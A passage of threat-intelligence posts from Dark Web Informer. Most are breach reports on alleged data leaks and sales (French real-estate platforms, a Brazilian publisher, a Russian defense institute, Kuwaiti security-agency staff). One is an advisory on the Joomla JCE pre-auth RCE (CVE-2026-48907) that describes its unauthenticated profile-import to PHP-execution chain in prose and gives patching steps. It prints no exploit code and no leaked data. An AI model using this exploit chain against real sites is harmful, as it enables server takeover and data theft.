INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Brazilian Construction Information Company PiniWeb Allegedly Breached, 13.9 GB Listed For Sale URL: https://darkwebinformer.com/brazilian-construction-information-company-piniweb-allegedly-breached-13-9-gb-listed-for-sale/ Last updated: 2026-06-18T16:35:47.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Information Services ## Brazilian Construction Information Company PiniWeb Allegedly Breached, 13.9 GB Listed For Sale A threat actor using the alias **S0BER** is advertising the sale of a claimed **\~13.9 GB dataset of around 10,290 files** across three RAR archives, spanning **2003 to 2026**, said to be stolen from **PiniWeb / Editora Pini** (piniweb.com.br), a Brazilian information company that has served the construction industry since 1948\. According to the listing, the data allegedly includes subscriber and customer databases (LGPD-relevant personal data), government procurement records and tax invoices tied to public-sector and corporate clients, proprietary construction price-table data (SINAPI/TCPO), SQL scripts and database schemas, Outlook PST email archives, internal infrastructure and remote-access configurations, and a code-signing certificate. The seller themselves rates several categories as high or critical risk. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data\~13.9 GB PriceFor sale Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil ActorS0BER ### ▣Post details TargetPiniWeb / Editora Pini (piniweb.com.br) Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil SectorInformation Services / Construction Claim\~13.9GB / 10,290 files for sale DataCustomer DBs, gov records, DB assets Archives3 RAR files (2003-2026) ObservedJun 18, 2026 ActorS0BER ### !Allegedly included - \~10,290 files (\~13.9 GB) - 3 RAR archives (2003-2026) - Subscriber & customer databases - Government procurement & NF-e records - Proprietary SINAPI/TCPO price data - SQL scripts & database schemas - Outlook PST email archives - Code-signing cert & infra configs ### ◱Screenshots [ ![PiniWeb Brazil alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/823547823478652187654876215348761.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/823547823478652187654876215348761.png) [ ![PiniWeb Brazil alleged leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/823547823478652187654876215348762.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/823547823478652187654876215348762.png) [ ![PiniWeb Brazil alleged leak Screenshot 3](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/823547823478652187654876215348763.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/823547823478652187654876215348763.png) ### ⚠Potential impact This sits in the critical tier because the listing allegedly combines several high-impact data types. On the personal-data side, subscriber, customer, and prospect databases plus PST email archives would expose LGPD-relevant personal information of individuals, along with references to several named employees. On the business side, government procurement records, tax invoices, and named public-sector bodies and corporate clients could expose sensitive commercial relationships. Most seriously from a security standpoint, the listing claims to include database schemas and SQL logic, internal infrastructure and remote-access (RDP) configurations, and a **code-signing certificate**. If a usable code-signing certificate is exposed it could let attackers sign malicious software as if it came from the company, which is why such a certificate would warrant immediate revocation; exposed infrastructure and database logic similarly raise the risk of follow-on intrusion. No purchase details, seller contacts, certificate contents, or technical specifics are reproduced here. Authenticity and scope are unverified. ### iStatus Unverified A detailed file manifest and statistics were posted to an underground forum offering the data for sale; the sample data, certificate, specific infrastructure details, and seller contact information are **not** reproduced here. The claim has **not been independently confirmed** and PiniWeb / Editora Pini has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Buyer and Seller Contact Records Allegedly Leaked From French Real Estate Platform Timer Immobilier URL: https://darkwebinformer.com/buyer-and-seller-contact-records-allegedly-leaked-from-french-real-estate-platform-timer-immobilier/ Last updated: 2026-06-18T16:10:14.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Buyer and Seller Contact Records Allegedly Leaked From French Real Estate Platform Timer Immobilier A threat actor using the alias **0xSec** has posted what they describe as a **small database from Timer Immobilier**, a specialized French real-estate agency and online platform that runs a transparent “interactive sale” (auction-style) system for property buyers and sellers. The leak comprises **two CSV files**, one for buyers (*acquéreurs*) and one for property owners (*propriétaires*), each reportedly holding **first and last names, email addresses, phone numbers, postal addresses, and account creation dates**. The actor characterises the dataset as “very small.” Its scope is **unverified**. Severity LOW Data2 CSVs (small) PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France Actor0xSec ### ▣Post details TargetTimer Immobilier, real estate platform Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate ClaimSmall database leaked (CSV) DataTwo files: buyers & owners (count not stated) ObservedJun 18, 2026 PriceFree leak (reply-gated) Actor0xSec ### !Allegedly included - Two CSV files - Buyer (acquéreur) records - Property owner records - First & last names - Email addresses - Phone numbers - Postal / home addresses - Account creation dates ### ◱Screenshot [ ![Timer Immobilier France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9237582378954872358792358796235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9237582378954872358792358796235.png) ### ⚠Potential impact Although the dataset is small in volume, the per-record content is direct consumer contact PII: named individuals (property buyers and sellers) tied to email addresses, phone numbers, and home addresses. Because buyers and sellers are attractive targets for transaction-related fraud, this kind of data can support targeted phishing, real-estate and payment scams, spam, and address-based targeting of individuals. The records do not appear to include dates of birth, government-ID numbers, passwords, or financial-account data. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample CSV rows and download links were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actor describes the data as a small leak from the platform. The claim has **not been independently confirmed** and Timer Immobilier has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Around 79,000 Records Allegedly Leaked From French Property Management Software MaGestionLocative URL: https://darkwebinformer.com/around-79-000-records-allegedly-leaked-from-french-property-management-software-magestionlocative/ Last updated: 2026-06-18T15:54:02.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Around 79,000 Records Allegedly Leaked From French Property Management Software MaGestionLocative A threat actor using the alias **ChimeraZ** has posted what they describe as a **partial database of MaGestionLocative** (magestionlocative.fr), a French property management software platform used by landlords and real-estate professionals. The leak is a **\~114 MB JSON dataset of about 79,000 records**. The sampled entries are generated documents such as tenant correspondence and rent receipts (*quittances*), which reportedly contain **tenant names, home addresses, rent amounts, and tenancy and insurance details**, along with the company's own contact information. The dataset's scope is **unverified**. Severity MEDIUM Data\~79K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetMaGestionLocative (magestionlocative.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate / SaaS ClaimPartial database leaked (114 MB JSON) Data\~79K records (tenant documents) ObservedJun 18, 2026 PriceFree leak (reply-gated) ActorChimeraZ ### !Allegedly included - \~79,000 records (claimed) - 114 MB JSON dataset - Tenant full names - Home & postal addresses - Rent receipts (quittances) - Rent amounts & dates - Insurance & tenancy details - Landlord / agency correspondence ### ◱Screenshot [ ![MaGestionLocative France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/123874927983459872365987623958.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/123874927983459872365987623958.png) ### ⚠Potential impact Because the leaked records are **private property-management documents** rather than public listings, the per-record sensitivity is higher than a typical listings leak. The sampled correspondence and rent receipts reportedly tie tenant full names to home addresses, rent amounts, and tenancy and insurance status. That combination can support targeted phishing (for example fake landlord, insurance, or rent-payment notices), rental scams, social engineering, and address-based targeting of individuals. No passwords, government-ID numbers, or payment-card data are referenced in the samples. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample document records and download links were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actor describes the data as a partial leak of the platform's database. The claim has **not been independently confirmed** and MaGestionLocative has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Daily Dose of Dark Web Informer - June 17th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-june-17th-2026/ Last updated: 2026-06-17T21:37:03.000Z Dark Web Informer # Daily Threat Intelligence Digest Real-time breach tracking, ransomware activity, and dark-web monitoring. **23** SIGNALS TODAY **3** REPORTS REAL-TIME Data Access 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms [/socials ↗](https://darkwebinformer.com/socials) Reach 🔥 Advertising Opportunities Reach a highly engaged audience. [View details →](https://darkwebinformer.com/advertising) 90.9k Unique Visitors 170.6k Pageviews LAST 30 DAYS · AS OF 2026-06-04 · NEXT UPDATE 07-04 Premium 🔒 Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) Classification Key 📰**Law Enforcement** \- LEA updates, investigations ⚠️**Dark Web Notices** \- forums, markets, announcements ❗️**Urgent Threats** \- breaches, ransomware, vulnerabilities 💡**Insights & Tools** \- guides, OSINT, learning resources █ Today's Intelligence 23 ENTRIES Threat Intelligence · Reports REPORT❗️[More Than 105,000 Records Allegedly Leaked From French Insurance Assistance Firm Inter Mutuelles Habitat](https://darkwebinformer.com/more-than-105-000-records-allegedly-leaked-from-french-insurance-assistance-firm-inter-mutuelles-habitat/) REPORT❗️[Over 63,000 Records Allegedly Leaked From French Vehicle Inspection Firm Autosur](https://darkwebinformer.com/over-63-000-records-allegedly-leaked-from-french-vehicle-inspection-firm-autosur/) REPORT❗️[Personal Data of Alleged Kuwaiti National Security Agency Employees Listed For Sale](https://darkwebinformer.com/personal-data-of-alleged-kuwaiti-national-security-agency-employees-listed-for-sale/) REPORT❗️[Russian Defense Research Institute VNIIR-M Allegedly Breached, 116GB Listed For Sale](https://darkwebinformer.com/russian-defense-research-institute-vniir-m-allegedly-breached-116gb-listed-for-sale/) REPORT❗️[Around 93,900 Records Allegedly Leaked From French Real Estate Software TakTikimmo](https://darkwebinformer.com/around-93-900-records-allegedly-leaked-from-french-real-estate-software-taktikimmo/) REPORT❗️[Pre-Auth RCE in Joomla Content Editor: Profile Import to PHP Execution (CVE-2026-48907)](https://darkwebinformer.com/pre-auth-rce-in-joomla-content-editor-profile-import-to-php-execution-cve-2026-48907/) X / Twitter Updates NOTICE❗️[A threat actor going by DogmaT3ch is distributing a dataset tied to SFR, a French telecommunications company, claiming roughly 1.1 million account-holder records.](https://x.com/DarkWebInformer/status/2067262585078976812?s=20) NOTICE❗️[A threat actor going by ChoDesign is selling an automated API attack tool, "API Hunter V3.0.0," on a cybercrime forum, marketing it for discovering and exploiting hidden API endpoints.](https://x.com/DarkWebInformer/status/2067264769518678189?s=20) NOTICE❗️[FortiBleed, a newly reported Fortinet-focused campaign where attackers allegedly compromised tens of thousands of Fortinet firewalls and VPN gateways by abusing exposed services and reused or previously leaked credentials.](https://x.com/DarkWebInformer/status/2067267062406259148?s=20) NOTICE❗️[A threat actor going by irleak is selling a dataset aggregated from 20+ Iranian travel agencies, claiming more than 107 million personal records spanning firms including Haftorang, Tikban, SnappTrip, and Avan Gasht.](https://x.com/DarkWebInformer/status/2067270366171676880?s=20) NOTICE❗️[A threat actor going by stalker8083 is selling a dataset tied to Dgshahr, an Iranian digital credit and installment-shopping platform, claiming roughly 5.1 million user records.](https://x.com/DarkWebInformer/status/2067273690543251559?s=20) NOTICE❗️[A threat actor going by dejante1337 is distributing a dataset tied to Laforet, a French real estate agency network, claiming an active dump of customer and agency records.](https://x.com/DarkWebInformer/status/2067276501452825086?s=20) NOTICE❗️[A threat actor going by Duk3nk, claiming affiliation with BlckOrder, is releasing a dataset tied to the union of driving schools of São Paulo State, Brazil, for free, claiming over 1,906 records.](https://x.com/DarkWebInformer/status/2067279665434071217?s=20) NOTICE❗️[A threat actor going by MagoSpeak, alongside Zer00, is selling Outlook account access tied to the Universidad Autónoma del Noroeste (Saltillo) in Mexico, claiming 14,383 accounts with student benefits and Office tools active through 2029.](https://x.com/DarkWebInformer/status/2067281988336116100?s=20) LUL💡[Lul](https://x.com/DarkWebInformer/status/2067282757609238833?s=20) NOTICE❗️[A threat actor going by Zab26 is selling a large-scale healthcare exposure dataset tied to French and European health systems, claiming 533 GB across 1,167,076 files spanning medical, identity, financial, and cryptographic material.](https://x.com/DarkWebInformer/status/2067286833369874853?s=20) NOTICE❗️[A threat actor going by Vandal is selling a dataset tied to http://Sony.yt, a Sony community and technical support forum (Poland), claiming the site's full database.](https://x.com/DarkWebInformer/status/2067290022064382361?s=20) NOTICE❗️[A threat actor going by DefualtCracker29 is selling a dataset of Philippine user and shipping records, claiming roughly 429K entries.](https://x.com/DarkWebInformer/status/2067292186098712859?s=20) NOTICE❗️[RansomHouse Ransomware has claimed 1 new victim](https://x.com/DarkWebInformer/status/2067309206688924121?s=20) UPDATE💡[Prince George County provided a network outage post on June 11th.](https://x.com/DarkWebInformer/status/2067331423825019096?s=20) NOTICE❗️[A threat actor going by 2019 is selling a dataset tied to Elina Medical Weight Loss Clinic, an Australian doctor-supervised weight-management service, claiming 28.4K+ patients across 300K+ records.](https://x.com/DarkWebInformer/status/2067338878525079842?s=20) NOTICE❗️[A threat actor going by Lich is advertising "Lich Stealer," a Python-based information-stealing malware, on a cybercrime forum, marketing it for credential and cryptocurrency theft from Chromium-based browsers.](https://x.com/DarkWebInformer/status/2067341647256371510?s=20) LUL💡[Breach took place in the future...](https://x.com/DarkWebInformer/status/2067345540606480445?s=20) [darkwebinformer.com](https://darkwebinformer.com/) · [socials](https://darkwebinformer.com/socials) · [subscribe](https://darkwebinformer.com/pricing) · [donate](https://darkwebinformer.com/donations/) © DARK WEB INFORMER · ALL RIGHTS RESERVED ### Pre-Auth RCE in Joomla Content Editor: Profile Import to PHP Execution (CVE-2026-48907) URL: https://darkwebinformer.com/pre-auth-rce-in-joomla-content-editor-profile-import-to-php-execution-cve-2026-48907/ Last updated: 2026-06-17T18:56:05.000Z Critical CVSS 4.0 10.0 Status Actively Exploited CISA KEV Added 2026-06-16 # Pre-Auth RCE in Joomla Content Editor: Profile Import to PHP Execution (CVE-2026-48907) Joomla Content Editor (JCE) • CWE-284 Improper Access Control • Published 2026-06-05 ## Vulnerability Overview [CVE-2026-48907](https://nvd.nist.gov/vuln/detail/CVE-2026-48907) is a critical unauthenticated remote code execution flaw in the **Joomla Content Editor (JCE)**, the most widely installed editor extension for Joomla. It earned a **CVSS v4.0 score of 10.0**, the maximum, because it needs no authentication and no user interaction and leads directly to arbitrary code execution. An attacker can create a fake editor profile without logging in, then abuse the profile import feature to upload and run arbitrary PHP on the server. The flaw was disclosed on June 5, 2026, and CISA [added it to the Known Exploited Vulnerabilities catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) on June 16, 2026 after evidence of active exploitation. CVE ID CVE-2026-48907 CVSS Score 10.0 - Critical Weakness CWE-284 Affected Product Joomla JCE Affected Versions ≤ 2.9.99.4 Attack Vector Network / Unauthenticated Exploitation In the Wild (KEV) Fixed In 2.9.99.5 / 2.9.99.6 Bottom Line If your Joomla site runs JCE 2.9.99.4 or earlier and is reachable from the internet, treat it as an active incident risk. Update to 2.9.99.6 now, and as an immediate stopgap block PHP execution in the `tmp/` directory. ## Why JCE Is a High-Value Target JCE is one of the most installed Joomla extensions, present on a very large number of public-facing sites. That ubiquity is the whole problem: a low-complexity, pre-auth RCE in a near-default component means a single exploit works broadly, with no need for phishing, credentials, or a tailored campaign. Joomla powers a long tail of small business, association, and government sites whose owners may not even know JCE is installed, let alone track its patch level. When the vulnerable surface is this large and this anonymous, attackers can scan and exploit at scale before most operators have identified who owns the site. ## Technical Analysis As [YesWeHack documented](https://www.yeswehack.com/news/rce-joomla-content-editor-extension) in their patch analysis, CVE-2026-48907 is not a single bug but a chained design failure in the JCE **profile import** workflow, where three weaknesses line up into a clean exploit path. The first link is **missing authorization**: the profile import endpoint lets an unauthenticated user create new editor profiles, an action that should never be exposed without a valid session. The second is **insufficient file validation**: the import accepts the supplied profile file without verifying its format or content, so a PHP payload passes as readily as a legitimate profile. The third is a **disabled upload safety control**: the import stages the uploaded file into the `tmp/` directory, and in a default or weakly hardened Joomla deployment that directory can execute PHP. Put in sequence, the attack is short and reliable. An attacker sends an unauthenticated request that creates a profile and uploads a crafted file, the file lands in `tmp/` with a `.php` extension and no content checks, and a follow-up request to that path executes the payload as the web server user. The result is pre-auth RCE on the underlying host. Multiple public proof-of-concept exploits now demonstrate exactly this chain end to end. ## Active Exploitation This vulnerability moved from disclosure to real-world attacker utility quickly. CISA added CVE-2026-48907 to its KEV catalog on June 16, 2026, citing evidence of exploitation and setting a remediation priority for federal agencies, with the same urgency recommended for everyone else. Working exploit code is freely available: a [public PoC from YesWeHack](https://github.com/ywh-jfellus/CVE-2026-48907) reproduces the file-write-to-execution chain, an earlier independent PoC exists, and a Nuclei template has been published for mass detection. With a maximum CVSS score, no authentication requirement, and ready tooling, internet-exposed Joomla sites running vulnerable JCE versions should be considered prime, easily discoverable targets. ## Am I Affected? You are affected if you run JCE version 2.9.99.4 or earlier (the affected range covers 1.0.0 through 2.9.99.4). Check your installed version in the Joomla administrator under Extensions, then Manage. One important nuance from the public research: the final code-execution step depends on PHP being executable from the `tmp/` directory. A vulnerable JCE version on a server that already blocks PHP execution in `tmp/` denies the attacker the execution step, though you should still patch rather than rely on that hardening alone. ## Affected Versions & Fixes | JCE Version | Status | Resolution | | ---------------- | ---------- | ------------------------------------------------------------ | | 1.0.0 - 2.9.99.4 | Vulnerable | Update to 2.9.99.6 | | 2.9.99.5 | Fixed | Addresses the vulnerability; 2.9.99.6 adds further hardening | | 2.9.99.6+ | Fixed | Recommended target version | ## Mitigation & Remediation Priority order, drawn from the [GitHub Security Advisory](https://github.com/advisories/GHSA-c3f5-4g7f-qjqj) and the [YesWeHack analysis](https://www.yeswehack.com/news/rce-joomla-content-editor-extension): 1. **Update JCE immediately.** Upgrade to 2.9.99.5 or later, ideally 2.9.99.6, which fully addresses the flaw and adds extra hardening. This is the only complete fix. 2. **Block PHP execution in `tmp/`.** If you cannot patch right away, configure your web server to deny PHP execution, or public access entirely, to the `tmp/` directory. This removes the final execution step of the chain. 3. **Harden the webserver.** Review upload directories and ensure no writable path can execute scripts, and confirm Joomla and its extensions are kept current. 4. **Hunt for compromise.** Because exploitation is active and the bug is pre-auth, assume opportunistic scanning. Review `tmp/` and web roots for unexpected `.php` files, audit for unfamiliar editor profiles, and check web server logs for anomalous requests to the profile import endpoint and to files under `tmp/`. ## The Bigger Picture CVE-2026-48907 is a reminder that the soft underbelly of the web is rarely the CMS core; it is the ubiquitous third-party extension that everyone installs and few people track. A maximum-severity, pre-auth RCE in a component this common is exactly the kind of bug that fuels mass website compromise, defacement, and commodity malware hosting, because the exploit is cheap and the target list is enormous. The defensive takeaway is unglamorous but decisive: inventory your extensions, subscribe to their advisories, patch the plugins as aggressively as you patch the platform, and never let a writable upload directory double as a place that can execute code. ## References - [YesWeHack - Unauthenticated RCE in the Joomla Content Editor Extension](https://www.yeswehack.com/news/rce-joomla-content-editor-extension) - [NVD - CVE-2026-48907](https://nvd.nist.gov/vuln/detail/CVE-2026-48907) - [GitHub Security Advisory - GHSA-c3f5-4g7f-qjqj](https://github.com/advisories/GHSA-c3f5-4g7f-qjqj) - [CISA - Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - [YesWeHack - Public Proof-of-Concept and Lab](https://github.com/ywh-jfellus/CVE-2026-48907) - [Joomla Content Editor - Vendor Site](https://www.joomlacontenteditor.net) ### Around 93,900 Records Allegedly Leaked From French Real Estate Software TakTikimmo URL: https://darkwebinformer.com/around-93-900-records-allegedly-leaked-from-french-real-estate-software-taktikimmo/ Last updated: 2026-06-17T18:39:11.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Around 93,900 Records Allegedly Leaked From French Real Estate Software TakTikimmo A threat actor using the alias **ChimeraZ** has posted what they describe as the **database of TakTikimmo** (taktikimmo.fr), a French professional real-estate software platform that helps agencies manage property listings, client relationships, and sales processes. The leak is a **\~209 MB JSON dataset of about 93,895 records**, reportedly including roughly **3,663 phone numbers**. The sampled rows consist mainly of property-listing data: listing IDs and types, dates, prices, surface areas and room counts, descriptions, locations, photo URLs, energy-performance diagnostics, and agent contact details such as names and phone numbers. The dataset's scope is **unverified**. Severity LOW Data93.9K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetTakTikimmo (taktikimmo.fr), real estate software Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate / SaaS ClaimDatabase leaked (209 MB JSON) Data\~93.9K records, \~3,663 phone numbers ObservedJun 17, 2026 PriceFree leak (reply-gated) ActorChimeraZ ### !Allegedly included - \~93,895 records (claimed) - \~3,663 phone numbers - 209 MB JSON dataset - Listing IDs & types - Prices, surfaces & room counts - Descriptions & locations - Listing photo URLs - Agent names & contact details ### ◱Screenshot [ ![TakTikimmo France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/3465879235798629873659872653697823.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/3465879235798629873659872653697823.png) ### ⚠Potential impact Because the sampled data is predominantly **real-estate listing information** (property descriptions, prices, surfaces, locations, photos, and energy diagnostics) that is largely published publicly by nature, the per-record sensitivity is low. The more sensitive elements are the roughly **3,663 phone numbers** and the agent contact details, which can aid bulk spam, cold outreach, lead harvesting, or competitor analysis. If the dataset also contains the platform's client-relationship (CRM) records, the sensitivity would rise, but the sampled rows shown are listing-centric. No passwords, financial, or government-ID data are referenced. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample JSON rows and download links were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actor describes the data as a leaked database of the platform. The claim has **not been independently confirmed** and TakTikimmo has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Russian Defense Research Institute VNIIR-M Allegedly Breached, 116GB Listed For Sale URL: https://darkwebinformer.com/russian-defense-research-institute-vniir-m-allegedly-breached-116gb-listed-for-sale/ Last updated: 2026-06-17T18:01:07.000Z Breach Report ![Russia flag](https://flagcdn.com/w40/ru.png)Russia Defense ## Russian Defense Research Institute VNIIR-M Allegedly Breached, 116GB Listed For Sale A threat actor using the alias **Rhodes** is advertising the sale of a claimed **116GB dataset of around 125,000 files** said to be stolen from **VNIIR-M**, described in the listing as a Russian scientific research institute focused on radio communications and electronic defense and involved in defense-related R&D. According to the post, the data allegedly spans military research and development activity, invoices and contracts, organizational and leadership structures, commercial details on partners, component sourcing and supply-chain records, an inventory of components used in Russian military systems, and projects involving weapon-system integration. The actor is offering it from **$60,000 (non-exclusive) to $100,000 (exclusive)** alongside a free sample teaser. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data\~116 GB Price$60k to $100k Country![Russia flag](https://flagcdn.com/w40/ru.png)Russia ActorRhodes ### ▣Post details TargetVNIIR-M, defense research institute Country![Russia flag](https://flagcdn.com/w40/ru.png)Russia SectorDefense / Military R&D Claim\~116GB / 125k files for sale DataR&D, contracts, component records Sample\~10GB free teaser offered ObservedJun 17, 2026 Price$60k non-excl / $100k excl ### !Allegedly included - \~125,000 files (\~116 GB) - Military R&D activities - Invoices & contracts - Org & leadership structures - Partner commercial contacts - Component sourcing & supply chain - Inventory of military-system components - Weapon-system integration projects ### ◱Screenshots [ ![VNIIR-M Russia alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/923785237894879213487692534876235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/923785237894879213487692534876235.png) [ ![VNIIR-M Russia alleged leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/923785237894879213487692534876236.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/923785237894879213487692534876236.png) ### ⚠Potential impact This sits in the critical tier because the listing allegedly involves internal data from a **Russian defense research institute**, including records tied to military components and weapon-system integration work. If authentic, exposure of contracts, sourcing, supply-chain and partner information could reveal procurement relationships and dependencies, expose named partner companies and individuals to targeting, and create espionage and operational-security risk for the institute. Internal organizational and leadership documents add further counterintelligence exposure. No technical specifications, component designs, sample files, seller contact details, or purchase information are reproduced here. Authenticity and scope are unverified. ### iStatus Unverified A free sample, proof screenshots, and a sale listing were posted to an underground forum; the sample files, technical content, seller contact details, and purchase information are **not** reproduced here. The claim has **not been independently confirmed** and VNIIR-M has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Personal Data of Alleged Kuwaiti National Security Agency Employees Listed For Sale URL: https://darkwebinformer.com/personal-data-of-alleged-kuwaiti-national-security-agency-employees-listed-for-sale/ Last updated: 2026-06-17T18:01:00.000Z Breach Report ![Kuwait flag](https://flagcdn.com/w40/kw.png)Kuwait Government ## Personal Data of Alleged Kuwaiti National Security Agency Employees Listed For Sale A threat actor using the alias **0cx00iq** has listed for sale what they describe as a dataset of **employees of Kuwait's National Security Agency**, the country's domestic intelligence service. The actor claims each record contains an employee's **full name, national ID number, phone number, mother's full name, date of birth, place of residence, marital status, military status, and blood type**, with data freshness stated as **June 2026**. The listing is advertised at around **$3,500 (negotiable)**, accompanied by a heavily watermarked spreadsheet sample. The dataset's authenticity and scope are **unverified**. Severity CRITICAL DataEmployee PII Price$3,500 Country![Kuwait flag](https://flagcdn.com/w40/kw.png)Kuwait Actor0cx00iq ### ▣Post details TargetKuwait National Security Agency (staff) Country![Kuwait flag](https://flagcdn.com/w40/kw.png)Kuwait SectorGovernment / National Security ClaimEmployee personal data for sale DataFull identity PII per employee (count not stated) FreshnessJun 2026 ObservedJun 17, 2026 Price$3,500 (negotiable) ### !Allegedly included - Full name & surname - National ID number - Phone number - Mother's full name - Date of birth - Place of residence - Marital & military status - Blood type ### ◱Screenshot [ ![Kuwait National Security Agency alleged data sale Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/7823959786239875659786322918734.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/7823959786239875659786322918734.png) ### ⚠Potential impact This sits in the most sensitive category of leak, allegedly exposing the identities and personal details of staff at a **national intelligence agency**. If authentic, the combination of full names, national ID numbers, home addresses, dates of birth, family information, and even blood type creates acute, real-world risk to the individuals named, including **physical targeting, surveillance, coercion, blackmail, and identity fraud**, as well as potential counterintelligence exposure for the agency itself. Mother's full name and date of birth are also widely used as identity-verification answers, compounding the fraud risk. No sample records, seller contact details, or purchase information are reproduced here. Authenticity and scope are unconfirmed. ### iStatus Unverified A watermarked spreadsheet sample and a 